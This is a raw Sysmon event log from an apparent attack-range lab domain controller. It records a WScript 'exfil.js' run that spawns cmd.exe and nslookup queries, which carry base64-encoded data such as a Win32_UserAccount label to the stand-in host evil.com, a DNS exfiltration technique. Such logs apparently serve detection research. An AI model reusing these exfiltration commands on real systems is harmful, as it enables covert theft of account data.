10341000x8000000000000000194419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.903{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-CC3D-000000005F02}7592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.903{2E1864BB-17A6-629A-CA3D-000000005F02}78561476C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-CC3D-000000005F02}7592C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.903{2E1864BB-17A6-629A-CC3D-000000005F02}7592C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A6-629A-CA3D-000000005F02}7856C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlygq.tmp 2>&1 10341000x8000000000000000194416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.882{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-CB3D-000000005F02}5916C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.882{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-CB3D-000000005F02}5916C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.867{2E1864BB-17A6-629A-CB3D-000000005F02}5916216C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-CA3D-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.851{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-CB3D-000000005F02}5916C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.851{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-CA3D-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.851{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.851{2E1864BB-17A1-629A-783D-000000005F02}55526228C:\Windows\System32\WScript.exe{2E1864BB-17A6-629A-CA3D-000000005F02}7856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.854{2E1864BB-17A6-629A-CA3D-000000005F02}7856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlygq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.851{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlngofzem.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.820{2E1864BB-17A6-629A-C83D-000000005F02}57605128C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-C93D-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.820{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.820{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.804{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.804{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.804{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C93D-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.804{2E1864BB-17A6-629A-C73D-000000005F02}28482788C:\Windows\system32\cmd.exe{2E1864BB-17A6-629A-C93D-000000005F02}5896C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.818{2E1864BB-17A6-629A-C93D-000000005F02}5896C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A6-629A-C73D-000000005F02}2848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlngofzem.tmp 2>&1 354300x8000000000000000194396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.633{00000000-0000-0000-0000-000000000000}1692<unknown process>-udptruefalse127.0.0.1-52100-false127.0.0.1-53domain 354300x8000000000000000194395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.340{00000000-0000-0000-0000-000000000000}3308<unknown process>-udptruefalse127.0.0.1-52091-false127.0.0.1-53domain 10341000x8000000000000000194394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.798{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-C83D-000000005F02}5760C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194393Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.798{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A6-629A-C83D-000000005F02}5760C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194392Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.782{2E1864BB-17A6-629A-C83D-000000005F02}57605128C:\Windows\system32\conhost.exe{2E1864BB-17A6-629A-C73D-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194391Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.767{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C83D-000000005F02}5760C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194390Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.767{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194389Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.767{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194388Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.767{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194387Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.767{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A6-629A-C73D-000000005F02}2848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194386Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:06.767{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 